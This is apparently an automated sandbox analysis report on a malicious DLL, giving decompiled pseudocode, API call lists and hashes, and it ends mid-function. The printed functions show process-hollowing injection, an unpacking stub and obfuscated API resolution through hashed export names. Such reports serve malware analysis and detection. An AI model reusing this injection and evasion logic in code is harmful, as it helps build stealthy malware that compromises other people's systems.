0x6e86afe7
0x6e86affb
0x6e86b027
0x6e86b02b
0x6e86b044
0x6e86b04c
0x6e86b066
0x6e86b072
0x6e86b077
0x6e86b07a
0x6e86b07d
0x6e86b07f
0x6e86b082
0x6e86b085
0x6e86b085
0x00000000
0x6e86afd0

APIs

VirtualAllocEx.KERNELBASE(?,00000000,00000000,00003000,00000004), ref: 6E86AF62
WriteProcessMemory.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6E86B0AF
VirtualAllocEx.KERNELBASE(?,00000000,00000042,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6E86B0D9
WriteProcessMemory.KERNELBASE(?,?,00000044,00000042,00000000), ref: 6E86B19D
VirtualProtectEx.KERNELBASE(?,?,00000042,00000010,00000000), ref: 6E86B1FB
SetThreadContext.KERNEL32(?,?), ref: 6E86B232
VirtualProtectEx.KERNELBASE(?,?,?,00000000,00000000), ref: 6E86B26B
ResumeThread.KERNELBASE(?), ref: 6E86B2B2
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 6E86AF2E

Part of subcall function 6E86BF50: LoadLibraryA.KERNEL32(?), ref: 6E86C1A1

ExitProcess.KERNEL32(00000000), ref: 6E86B2CE

Strings

D, xrefs: 6E86AEE1

Memory Dump Source

Source File: 00000004.00000002.2154531469.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000004.00000002.2154525591.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154545428.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154551264.000000006E882000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2154557143.000000006E885000.00000002.00020000.sdmp Download File

Similarity

API ID: ProcessVirtual$AllocMemoryProtectThreadWrite$ContextCreateExitLibraryLoadResume
String ID: D
API String ID: 2854380510-2746444292
Opcode ID: 9e38c269c1a5a4994ecb3d0781a69ba75ee0acecb99c15f14cdff8f57d899408
Instruction ID: 6e8cb0b2f3eba883a6ef3a5310a71f079f07b4519fc4f970fe5ff51a6e007e7e
Opcode Fuzzy Hash: 9e38c269c1a5a4994ecb3d0781a69ba75ee0acecb99c15f14cdff8f57d899408
Instruction Fuzzy Hash: 9FC1B9B2D402186BEF119BE89C42FEE777C9B5471DF140C24F918B72D5EB616A048BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E8A47A1, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,000006B6,00003000,00000040,000006B6,6E8A41F8), ref: 6E8A485E
VirtualAlloc.KERNEL32(00000000,000005CD,00003000,00000040,6E8A425A), ref: 6E8A4895
VirtualAlloc.KERNEL32(00000000,00022303,00003000,00000040), ref: 6E8A48F5
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E8A492B
VirtualProtect.KERNEL32(6E860000,00000000,00000004,6E8A4780), ref: 6E8A4A30
VirtualProtect.KERNEL32(6E860000,00001000,00000004,6E8A4780), ref: 6E8A4A57
VirtualProtect.KERNEL32(00000000,?,00000002,6E8A4780), ref: 6E8A4B24
VirtualProtect.KERNEL32(00000000,?,00000002,6E8A4780,?), ref: 6E8A4B7A
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E8A4B96

Memory Dump Source

Source File: 00000004.00000002.2154589702.000000006E8A4000.00000040.00020000.sdmp, Offset: 6E8A4000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 57d054768ecb4a813ecf50a7dcaf17930a2ef301419193303bab764567466bed
Instruction ID: a0261d6308447cdbfd573e7d54b4d5cb328fd445e7634a9c5d2ef9e89f251daa
Opcode Fuzzy Hash: 57d054768ecb4a813ecf50a7dcaf17930a2ef301419193303bab764567466bed
Instruction Fuzzy Hash: D1D16B725006009FDF21DF58C880B5277B6FFA8724B094598EE099F7DAE771A812EB74

Uniqueness

Uniqueness Score: -1.00%

Function 6E87DA20, Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E87DA20() {
				char _v28;
				void* _t4;

				_t4 = CreateEventW(0, 1, 0, E6E867200(0x6e8805f8,  &_v28));
				if(_t4 != 0) {
					SetEvent(_t4);
					_t4 = CloseHandle(_t4); // executed
				}
				SetLastError(0);
				return _t4;
			}

0x6e87da3f
0x6e87da47
0x6e87da4c
0x6e87da53
0x6e87da53
0x6e87da5b
0x6e87da66

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0CD06773,?,-6E881D33,?,6E8691EB,-6E881D33,?,6E8677A1,00000001), ref: 6E87DA3F
SetEvent.KERNEL32(00000000,?,?,0CD06773,?,-6E881D33,?,6E8691EB,-6E881D33,?,6E8677A1,00000001,?,-6E881D33,?,6E866A74), ref: 6E87DA4C
CloseHandle.KERNEL32(00000000), ref: 6E87DA53
SetLastError.KERNEL32(00000000,?,?,0CD06773,?,-6E881D33,?,6E8691EB,-6E881D33,?,6E8677A1,00000001,?,-6E881D33,?,6E866A74), ref: 6E87DA5B

Memory Dump Source

Source File: 00000004.00000002.2154531469.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000004.00000002.2154525591.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154545428.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154551264.000000006E882000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2154557143.000000006E885000.00000002.00020000.sdmp Download File

Similarity

API ID: Event$CloseCreateErrorHandleLast
String ID:
API String ID: 2055590504-0
Opcode ID: 6878810bc24a78b0c83452415ef021b0229cb85cc92c85563120eaae62a81a73
Instruction ID: 85fc5d4bfa535f18ab206db9c613507df85d8ee11776eb1e6005a4a636e29e96
Opcode Fuzzy Hash: 6878810bc24a78b0c83452415ef021b0229cb85cc92c85563120eaae62a81a73
Instruction Fuzzy Hash: 11E092715816006BFA1026E95C0AFAB362D9F02646F010010FE0DDD1C0F6514400C6F6

Uniqueness

Uniqueness Score: -1.00%

Function 6E896540, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 351memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(00003037), ref: 6E8967F7

Strings

70, xrefs: 6E896547

Memory Dump Source

Source File: 00000004.00000002.2154562921.000000006E886000.00000020.00020000.sdmp, Offset: 6E886000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID: 70
API String ID: 544645111-4144464487
Opcode ID: 441ae5ec4871b743be121f91b1fdcd304745ca0191c45be6902c0d50f71c178b
Instruction ID: 5a422b995b19bdcf5c80dbc41371aa60a634a8231754bf2d973ad102016570e8
Opcode Fuzzy Hash: 441ae5ec4871b743be121f91b1fdcd304745ca0191c45be6902c0d50f71c178b
Instruction Fuzzy Hash: C2F1A470A04925CFDB08CF6CC25D56DBFB3F786306B00826AE56A97389D7785E45DB80

Uniqueness

Uniqueness Score: -1.00%

Function 6E87D770, Relevance: 3.0, APIs: 2, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E87D770() {
				char _v22;

				GetConsoleCP();
				GetFileAttributesW(E6E867200(0x6e8805f8,  &_v22)); // executed
				return GetCapture();
			}

0x6e87d776
0x6e87d78e
0x6e87d798

APIs

GetConsoleCP.KERNEL32 ref: 6E87D776
GetFileAttributesW.KERNELBASE(00000000,?,?,?,?,?,?,6E86AE51), ref: 6E87D78E

Memory Dump Source

Source File: 00000004.00000002.2154531469.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000004.00000002.2154525591.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154545428.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154551264.000000006E882000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2154557143.000000006E885000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesConsoleFile
String ID:
API String ID: 1533235433-0
Opcode ID: adc83ee011bebabb73d2b9f503cf76cc734d5ceef3cff2a0355683b03f915c46
Instruction ID: d4b6ae779195ad389640e8b4cbbae7a587042b89ecc34c28d4bd090604618c87
Opcode Fuzzy Hash: adc83ee011bebabb73d2b9f503cf76cc734d5ceef3cff2a0355683b03f915c46
Instruction Fuzzy Hash: 04D0C7B18419099BEA4037EC580DC6B376D5D1620AF450461ED1D55302F6295558D7F6

Uniqueness

Uniqueness Score: -1.00%

Function 6E87B1B0, Relevance: 1.5, APIs: 1, Instructions: 23
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E87B1B0(intOrPtr _a4) {
				void* _t5;
				void* _t7;
				intOrPtr _t8;

				_t8 = _a4;
				_t13 = _t8;
				if(_t8 == 0) {
					__eflags = 0;
					return 0;
				}
				_t5 = E6E869D50(0xfef6f706);
				E6E86BF50(_t13, 0, 0x8685de3);
				_t7 = RtlAllocateHeap( *0x6e882124, 0, _t8 + _t5 + 0x657d085a); // executed
				return _t7;
			}

0x6e87b1b4
0x6e87b1b7
0x6e87b1b9
0x6e87b1eb
0x00000000
0x6e87b1eb
0x6e87b1c0
0x6e87b1d6
0x6e87b1e7
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00000000,?), ref: 6E87B1E7

Memory Dump Source

Source File: 00000004.00000002.2154531469.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000004.00000002.2154525591.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154545428.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154551264.000000006E882000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2154557143.000000006E885000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7a47d741adc307cd1047a93a05773fdacb586ed359d9fcdef84c3c51d848c1d6
Instruction ID: f7348e401da1731829167d00bb4b3840e114ef6208fbe5ea1e670152d22595dd
Opcode Fuzzy Hash: 7a47d741adc307cd1047a93a05773fdacb586ed359d9fcdef84c3c51d848c1d6
Instruction Fuzzy Hash: 7DE0CD339451287BCA1266D8AC51F8B374D8F06769F150D31FD0CA7164E541761086F1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E8769A0, Relevance: 7.6, APIs: 5, Instructions: 65
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E8769A0(void* __eflags) {
				intOrPtr _v32;
				signed int _v36;
				void* _v44;
				signed char _t13;
				signed int _t16;
				signed int _t19;
				long _t23;
				void* _t24;
				void* _t25;
				void* _t27;

				_t24 = CreateToolhelp32Snapshot(4, 0);
				_v44 = E6E869D50(0x647400b0);
				_t23 = GetCurrentProcessId();
				_t13 = E6E8655C0(Thread32First(_t24,  &_v44), 0);
				_t27 = _t25 + 0xc;
				if((_t13 & 0x00000001) != 0) {
					L6:
					_t19 = 0;
				} else {
					0;
					0;
					while(GetLastError() != 0x12) {
						_t16 = E6E8655C0(_v32, _t23);
						_t27 = _t27 + 8;
						_t19 =  ~(_t16 & 0x00000001) & _v36;
						if(Thread32Next(_t24,  &_v44) != 0) {
							if(_t19 == 0) {
								continue;
							} else {
							}
						}
						goto L7;
					}
					goto L6;
				}
				L7:
				return _t19;
			}

0x6e8769b2
0x6e8769c1
0x6e8769ca
0x6e8769d9
0x6e8769de
0x6e8769e3
0x6e876a25
0x6e876a25
0x6e8769eb
0x6e8769eb
0x6e8769ef
0x6e8769f0
0x6e8769ff
0x6e876a04
0x6e876a11
0x6e876a1d
0x6e876a21
0x00000000
0x00000000
0x6e876a23
0x6e876a21
0x00000000
0x6e876a1d
0x00000000
0x6e8769f0
0x6e876a27
0x6e876a30

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 6E8769AD
GetCurrentProcessId.KERNEL32 ref: 6E8769C4
Thread32First.KERNEL32(00000000,?), ref: 6E8769D1
GetLastError.KERNEL32 ref: 6E8769F0
Thread32Next.KERNEL32(00000000,?), ref: 6E876A16

Memory Dump Source

Source File: 00000004.00000002.2154531469.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000004.00000002.2154525591.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154545428.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154551264.000000006E882000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2154557143.000000006E885000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread32$CreateCurrentErrorFirstLastNextProcessSnapshotToolhelp32
String ID:
API String ID: 1709709923-0
Opcode ID: ee06184f2d0eea34212ff456b7591cf06aa2a3691c8ddb971493b22b589ab588
Instruction ID: 1048836e42ba42e806d8e4ac73d1693c53e102e714c78896584446a0a6bd158d
Opcode Fuzzy Hash: ee06184f2d0eea34212ff456b7591cf06aa2a3691c8ddb971493b22b589ab588
Instruction Fuzzy Hash: 14012BB39A03045BEF1167E99C89FEF7F2CEF5225CF540C35ED04A5242FA15854491B1

Uniqueness

Uniqueness Score: -1.00%

Function 6E86D830, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 280
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E6E86D830(signed int _a4, intOrPtr _a8) {
				signed short* _v20;
				CHAR* _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v140;
				void* _t78;
				void* _t79;
				void* _t83;
				void* _t93;
				signed short* _t100;
				signed short* _t102;
				void* _t105;
				void* _t112;
				char _t113;
				signed short* _t114;
				void* _t115;
				void* _t120;
				signed int _t122;
				signed int _t124;
				signed int _t133;
				void* _t135;
				intOrPtr _t136;
				signed int _t137;
				signed int _t139;
				_Unknown_base(*)()* _t141;
				char* _t143;
				signed int _t144;
				void* _t149;
				signed short* _t153;
				signed int _t155;
				intOrPtr _t159;
				void* _t160;
				signed char* _t161;
				void* _t165;
				intOrPtr _t166;
				_Unknown_base(*)()* _t170;
				signed short* _t173;
				CHAR* _t174;
				signed int _t175;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t180;
				void* _t183;
				void* _t187;
				void* _t191;
				void* _t192;
				void* _t199;

				_t133 = _a4;
				_t141 = 0;
				_t204 = _t133;
				if(_t133 != 0) {
					_t78 = E6E8712D0(_t204, _t133);
					_t149 = _t78;
					_t165 =  *((intOrPtr*)(_t78 + 0x60)) + _t133;
					_t79 = E6E869D50(0x975b6640);
					_t141 = 0;
					_t180 = _t178 + 8;
					_t205 =  *((intOrPtr*)(_t79 + _t165 + 0xcd0992c));
					if( *((intOrPtr*)(_t79 + _t165 + 0xcd0992c)) != 0) {
						_t6 = _t165 + 0xcd09914; // 0xcd09914
						_t166 = _t79 + _t6;
						_v36 =  *((intOrPtr*)(_t149 + 0x64));
						_t153 =  *((intOrPtr*)(_t166 + 0x24)) + _t133 - E6E869D50(0x60421690) + 0x436163c;
						_v32 = _t166;
						_t83 = E6E861460(_t205, E6E861460(_t205,  *((intOrPtr*)(_t166 + 0x20)), 0x5eaee274), _t133);
						_t183 = _t180 + 0x14;
						_v40 =  ~_t133;
						_t143 = _t83 + 0xa1511d8c;
						_t135 = 0;
						0;
						do {
							_v20 = _t153;
							_v24 = _t143;
							_t155 =  ~(E6E861460(0,  ~( *_t143), _v40));
							E6E861460(0,  *_t143, _a4);
							E6E878F20( &_v140, E6E869D50(0x647400c8));
							_t187 = _t183 + 0x1c;
							_t91 =  *_t155;
							if( *_t155 != 0) {
								_t176 = 0;
								do {
									 *((char*)(_t177 + _t176 - 0x88)) = E6E87D680(0, _t91);
									_t176 = _t176 - E6E8622E0(0, 0, 1);
									E6E861460(0, _t176, 1);
									_t187 = _t187 + 0x14;
									_t91 =  *(_t155 + _t176) & 0x000000ff;
								} while (( *(_t155 + _t176) & 0x000000ff) != 0);
							}
							_push(0xffffffff);
							_t93 = E6E8700A0( &_v140);
							_t183 = _t187 + 8;
							if(_t93 == _a8) {
								_t136 = _v32;
								_t170 = E6E861460(__eflags, 0x637bf4a0 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x1c)) + _a4 - E6E869D50(0xffb90b0) + 0x6b8f901c + ( *_v20 & 0x0000ffff) * 4)), _a4) + 0x9c840b60;
								_t100 = E6E8622E0(__eflags, _t136, 0x52cc09fc);
								_t159 = _v36;
								_v20 = _t100;
								E6E861460(__eflags, _t136, _t159);
								_t141 = _t170;
								_t191 = _t183 + 0x1c;
								__eflags = _t170 - _t136;
								if(_t170 > _t136) {
									_t102 = _v20;
									__eflags = _t141 - _t159 + _t102 + 0x52cc09fc;
									if(_t141 < _t159 + _t102 + 0x52cc09fc) {
										_v24 =  *_t141;
										_v20 = _t141;
										_t105 = E6E867DD0(0x82);
										_t192 = _t191 + 4;
										_t144 = _v24;
										_t137 = 0;
										__eflags = _t144 - _t105;
										if(_t144 != _t105) {
											_t122 = _t144;
											_t175 = 0;
											__eflags = 0;
											0;
											do {
												 *(_t177 + _t175 - 0x88) = _t122;
												_t124 = E6E861460(__eflags, E6E8622E0(__eflags, 0, _t175), 0xffffffff);
												_t137 =  ~_t124;
												E6E861460(__eflags, _t175, 1);
												_t192 = _t192 + 0x18;
												_t175 = _t137;
												_t122 =  *(_v20 - _t124) & 0x000000ff;
												__eflags = _t122 - 0x2e;
											} while (__eflags != 0);
										}
										_t160 = E6E861460(__eflags, _t137, E6E869D50(0x3638cbc4));
										E6E861460(__eflags, _t137, 1);
										_v24 = _v20 + _t160 - 0x524ccb67;
										 *((char*)(_t177 + _t137 - 0x88)) = E6E867DD0(0x82);
										 *((char*)(_t177 + _t160 - 0x524ccbef)) = 0x64;
										_t112 = E6E869D50(0x8707952b);
										 *((char*)(_t177 + _t137 - 0x86)) = 0x6c;
										_t113 = E6E867DD0(0xc0);
										_v28 = 0;
										 *((char*)(_t137 - _t112 +  &_v140 - 0x1c8c6a76)) = _t113;
										_t114 = _v20;
										 *((char*)(_t177 + _t137 - 0x84)) = 0;
										_t173 = _t114;
										_t115 = E6E867DD0(0x8f);
										_t199 = _t192 + 0x24;
										__eflags =  *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) - _t115;
										if( *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) != _t115) {
											_t174 = _v24;
										} else {
											_t139 = _v24[1];
											__eflags = _t139;
											if(_t139 == 0) {
												_t174 =  &_v28;
											} else {
												_t161 = _t160 + _t173 - 0x524ccb65;
												do {
													_t120 = E6E8655A0(_v28, 0xa);
													_t199 = _t199 + 8;
													_v28 = _t139 + _t120 - 0x30;
													_t139 =  *_t161 & 0x000000ff;
													_t161 =  &(_t161[1]);
													__eflags = _t139;
												} while (_t139 != 0);
												_t174 =  &_v28;
											}
										}
										_t141 = GetProcAddress(LoadLibraryA( &_v140), _t174);
									}
								}
							} else {
								goto L7;
							}
							goto L22;
							L7:
							_t135 = _t135 + 1;
							_t143 =  &(_v24[4]);
							_t153 =  &(_v20[1]);
						} while (_t135 <  *((intOrPtr*)(_v32 + 0x18)));
						_t141 = 0;
					}
				}
				L22:
				return _t141;
			}

0x6e86d839
0x6e86d83c
0x6e86d83e
0x6e86d840
0x6e86d847
0x6e86d852
0x6e86d854
0x6e86d85b
0x6e86d860
0x6e86d862
0x6e86d865
0x6e86d86d
0x6e86d873
0x6e86d873
0x6e86d880
0x6e86d894
0x6e86d89f
0x6e86d8af
0x6e86d8b4
0x6e86d8bb
0x6e86d8be
0x6e86d8c4
0x6e86d8cc
0x6e86d8d0
0x6e86d8d2
0x6e86d8d5
0x6e86d8ea
0x6e86d8f0
0x6e86d90d
0x6e86d912
0x6e86d915
0x6e86d919
0x6e86d91b
0x6e86d920
0x6e86d92c
0x6e86d942
0x6e86d944
0x6e86d949
0x6e86d94c
0x6e86d950
0x6e86d920
0x6e86d954
0x6e86d95d
0x6e86d962
0x6e86d968
0x6e86d98d
0x6e86d9c4
0x6e86d9d0
0x6e86d9d8
0x6e86d9db
0x6e86d9e0
0x6e86d9e5
0x6e86d9e7
0x6e86d9ea
0x6e86d9ec
0x6e86d9f2
0x6e86d9fc
0x6e86d9fe
0x6e86da06
0x6e86da0e
0x6e86da11
0x6e86da16
0x6e86da19
0x6e86da1c
0x6e86da1e
0x6e86da20
0x6e86da22
0x6e86da24
0x6e86da24
0x6e86da2c
0x6e86da30
0x6e86da30
0x6e86da45
0x6e86da51
0x6e86da56
0x6e86da5b
0x6e86da61
0x6e86da65
0x6e86da68
0x6e86da68
0x6e86da30
0x6e86da83
0x6e86da88
0x6e86da9a
0x6e86daaa
0x6e86dab1
0x6e86dabe
0x6e86dac8
0x6e86dad7
0x6e86dae5
0x6e86daec
0x6e86daf3
0x6e86daf6
0x6e86db05
0x6e86db0c
0x6e86db11
0x6e86db14
0x6e86db16
0x6e86db54
0x6e86db18
0x6e86db1e
0x6e86db21
0x6e86db23
0x6e86db59
0x6e86db25
0x6e86db25
0x6e86db30
0x6e86db35
0x6e86db3a
0x6e86db44
0x6e86db47
0x6e86db4a
0x6e86db4b
0x6e86db4b
0x6e86db4f
0x6e86db4f
0x6e86db23
0x6e86db70
0x6e86db70
0x6e86d9fe
0x00000000
0x00000000
0x00000000
0x00000000
0x6e86d96a
0x6e86d973
0x6e86d974
0x6e86d977
0x6e86d97a
0x6e86d983
0x6e86d983
0x6e86d86d
0x6e86db72
0x6e86db7b

APIs

LoadLibraryA.KERNEL32(?), ref: 6E86DB62
GetProcAddress.KERNEL32(00000000,?), ref: 6E86DB6A

Strings

l, xrefs: 6E86DAC8
d, xrefs: 6E86DAB1

Memory Dump Source

Source File: 00000004.00000002.2154531469.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000004.00000002.2154525591.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154545428.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154551264.000000006E882000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2154557143.000000006E885000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: d$l
API String ID: 2574300362-91452987
Opcode ID: 7b4a92d44ac7b2441c01d442c7e8562b2e5b581f23e8e2d04f0a6ee794712ff1
Instruction ID: b95202682bf04e207f7104bf7086f092e745a9f393ff7dde92a284e1d0a58c29
Opcode Fuzzy Hash: 7b4a92d44ac7b2441c01d442c7e8562b2e5b581f23e8e2d04f0a6ee794712ff1
Instruction Fuzzy Hash: BF9109B6D001199BDB119FF8AC41AFE77A9AF1535CF140874DC49B7382EA319A188BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E861A00, Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E861A00() {
				intOrPtr _t9;
				WCHAR* _t10;
				struct HINSTANCE__* _t15;

				_t9 =  *0x6e8820d8; // 0x53325ec4
				_t10 = _t9 + 0xffffffd4;
				_t15 = (_t10 | 0x00000008) * _t10;
				CreateDialogParamW(_t15, _t10, _t15, _t15, _t15);
				GetVersion();
				return (_t10 * (_t15 + (_t15 + _t15 ^ 0x00000032) | _t10) ^ 0xffffffb4) + (_t15 + (_t15 + _t15 ^ 0x00000032) | _t10);
			}

0x6e861a06
0x6e861a0c
0x6e861a15
0x6e861a1d
0x6e861a39
0x6e861a47

APIs

CreateDialogParamW.USER32 ref: 6E861A1D
GetVersion.KERNEL32(?,6E868614,0000031F,?,6E866AB1,?,6E86AE51), ref: 6E861A39

Memory Dump Source

Source File: 00000004.00000002.2154531469.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000004.00000002.2154525591.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154545428.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154551264.000000006E882000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2154557143.000000006E885000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDialogParamVersion
String ID:
API String ID: 1068622756-0
Opcode ID: 37e265452a92e7b0ff53f2cb39981fae72a480cfc21c0330958a5c52900b91e2
Instruction ID: d8c6aa3a1853eb632f99aa3e5e8e38221463951269c4cb432129dd0cdcd0adff
Opcode Fuzzy Hash: 37e265452a92e7b0ff53f2cb39981fae72a480cfc21c0330958a5c52900b91e2
Instruction Fuzzy Hash: B9E092336139386B561089AF9CC4C97FF9CDE431AA3020227BE4CD36A1D1104C08C6F4

Uniqueness

Uniqueness Score: -1.00%

Function 6E87DA70, Relevance: .7, Instructions: 746
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E6E87DA70(void* __ecx, signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, signed int* _a12, void* _a16) {
				unsigned int _v20;
				signed int _v24;
				signed int* _v28;
				signed int _v32;
				signed int _v36;
				signed int* _v40;
				signed int _v44;
				signed int _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed int _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				signed int _v124;
				signed int _v128;
				void* _t304;
				signed int _t305;
				signed int _t309;
				void* _t311;
				signed int _t314;
				signed int _t317;
				signed int* _t319;
				signed int _t328;
				signed int _t329;
				void* _t331;
				void* _t336;
				void* _t338;
				void* _t344;
				intOrPtr _t347;
				void* _t355;
				signed int _t358;
				void* _t360;
				signed int _t366;
				signed int _t368;
				void* _t369;
				signed int _t376;
				signed int* _t377;
				signed int _t379;
				signed int _t380;
				void* _t383;
				signed int _t387;
				void* _t396;
				void* _t401;
				signed int _t408;
				void* _t409;
				void* _t410;
				void* _t412;
				intOrPtr _t414;
				void* _t415;
				signed int _t418;
				signed int _t421;
				void* _t425;
				void* _t426;
				signed char _t427;
				signed int _t432;
				intOrPtr _t434;
				signed char _t444;
				signed int _t445;
				intOrPtr _t450;
				signed int _t457;
				signed int _t459;
				signed int _t460;
				signed int* _t461;
				signed int* _t463;
				signed int _t464;
				signed int _t465;
				signed int* _t466;
				signed int _t471;
				signed int _t472;
				intOrPtr* _t475;
				signed int* _t476;
				signed int _t478;
				signed int _t479;
				signed int _t481;
				signed int* _t484;
				unsigned int _t486;
				unsigned int _t490;
				signed int _t491;
				intOrPtr _t492;
				signed int _t495;
				signed int _t498;
				signed int _t502;
				signed int _t503;
				signed int _t506;
				signed char _t507;
				intOrPtr* _t510;
				signed int _t525;
				signed int _t527;
				signed int _t532;
				signed int _t533;
				signed int _t542;
				signed int _t543;
				intOrPtr _t549;
				intOrPtr* _t551;
				signed int _t552;
				void* _t566;
				signed int _t569;
				signed int _t570;
				signed int* _t576;
				signed int _t581;
				signed int _t582;
				signed int* _t584;
				signed int _t586;
				signed int _t590;
				signed int _t592;
				signed int _t595;
				signed int _t599;
				void* _t600;
				void* _t602;
				void* _t604;
				void* _t606;
				void* _t621;
				void* _t629;
				void* _t632;
				void* _t633;
				void* _t634;
				void* _t635;

				_t532 = __edx;
				_t455 = _a12;
				_t584 = E6E87EC10();
				_v28 = E6E87EC10();
				_t549 = E6E87EC10();
				_v68 = E6E87EC10();
				_v40 = E6E87EC10();
				_v80 = E6E87EC10();
				_t304 = E6E87E3C0(__ecx, __eflags, _a12, _a16);
				_t602 = _t600 - 0x70 + 8;
				if(_t304 == 0) {
					_t305 = E6E87EBE0(_t455);
					_t602 = _t602 + 4;
					__eflags = _t305;
					if(_t305 == 0) {
						_v64 = _t549;
						_v52 = _t584;
						_t457 =  *_a16;
						__eflags = _t457 - 1;
						if(__eflags != 0) {
							_v24 =  *_a12;
							_t490 = E6E861460(__eflags,  *_a12 - 0x1a86f375, 0x1a86f376);
							_t309 = _a4;
							_v44 = _t457;
							_v20 = _t490;
							_t56 = _t490 + 0x3df43c37; // 0x3df43c37
							_t311 = E6E8622E0(__eflags, _t56, _t457);
							_t604 = _t602 + 0x10;
							_t459 = _t311 + 0xc20bc3c9;
							__eflags =  *((intOrPtr*)(_t309 + 4)) - _t459;
							if( *((intOrPtr*)(_t309 + 4)) < _t459) {
								_t432 = _a4;
								_t581 = _t432;
								 *(_t432 + 4) = _t459;
								_t434 = E6E863F90( *((intOrPtr*)(_t581 + 8)), _t459 * 4);
								_t604 = _t604 + 8;
								 *((intOrPtr*)(_t581 + 8)) = _t434;
							}
							_t551 = _v28;
							E6E867D70(_a12, _t551);
							E6E867D70(_a16, _t584);
							_t606 = _t604 + 0x10;
							_t314 =  *_t584;
							_t491 = _t584[2];
							_v32 = _t459;
							__eflags =  *(_t491 + _t314 * 4 - 4);
							if( *(_t491 + _t314 * 4 - 4) < 0) {
								_v56 = 0;
								_t460 = 1;
								goto L25;
							} else {
								_t525 = 0;
								__eflags = 0;
								_t481 = 1;
								do {
									_v56 = (_t525 << 0x00000020 | _t481) << 1;
									_v60 = _t481 + _t481;
									E6E87E320(_t584, 0x6e882028);
									_t425 = E6E861460(__eflags, E6E869D50(0xfa78285f) +  *_t584, 0xffffffff);
									_t426 = E6E869D50(0xfa78285f);
									_t481 = _v60;
									_t427 = E6E866BB0(__eflags,  *((intOrPtr*)(_t584[2] + (_t425 - _t426) * 4)), 0xffffffff);
									_t525 = _v56;
									_t606 = _t606 + 0x20;
									__eflags = _t427 & 0x00000001;
								} while ((_t427 & 0x00000001) != 0);
								__eflags = _t481 | _t525;
								if((_t481 | _t525) == 0) {
